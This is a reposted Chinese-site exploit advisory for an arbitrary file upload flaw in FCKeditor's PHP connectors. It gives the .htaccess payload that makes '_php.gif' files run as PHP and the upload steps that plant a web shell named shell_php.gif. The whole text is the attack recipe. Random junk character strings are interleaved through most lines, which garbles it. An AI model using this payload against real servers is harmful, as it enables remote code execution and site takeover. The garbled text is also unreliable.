FCKeditor所有php版本Upload上传漏洞
% o7 D5 ^, j5 i% r. ?5 d/ A作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07$ n9 {* o. y7 E
减小字体 增大字体
' } \; E7 Y- b. h; _[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability5 v6 C1 L+ L2 L& A! }; D
[+] Date: 20119 O$ \2 T2 [6 j
[+] Author : sinesafe.cn
7 Q1 a; o" h; F* [0 Q5 T2 i[+] Website : WwW.sinesafe.cn
; P& _( @4 d9 k% o+ l7 n6 K8 r———————————————————& O6 I d! C# X& W% Y/ `
1.create a htaccess file:2 K8 T, I5 F% u7 v; q% i9 |/ u+ Z
code:' r$ _! e9 w {. W5 o9 I% ?$ l
<FilesMatch “_php.gif”>$ I; D0 B: R$ J! Y+ h
SetHandler application/x-httpd-php
( P( \+ S' ?- q; H6 f</FilesMatch>
H6 m0 j) z/ \( z
6 l3 F4 w. _" D/ ?# |/ H$ ?$ S( O2.Now upload this htaccess with FCKeditor.! b+ |% r' t4 J' [1 r
J; s# c. X' P) ^http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
0 G z! l* Z0 D j- G3 @! D; s h$ g4 T8 K! }
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
7 i5 K$ R* O5 R. X9 j F2 E2 N( H5 |3 d/ Y. a2 O
———————————————————————————————-8 L7 X2 S& ?! O
3.Now upload shell.php.gif with FCKeditor.* A1 G( A' Q: m
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
0 J8 Q! K7 q% `+ N5.http://www.sinesafe.cn/anything/shell_php.gif6 ?# J0 j8 j- I" {3 M
6.Now shell is available from server. |
) L+ B8 ^3 d8 g* m9 B
" F9 P, F& h1 v' C- K1 P {/ ?& r5 t5 j
|
发表于 2013-10-27 17:25:21
收藏
支持
反对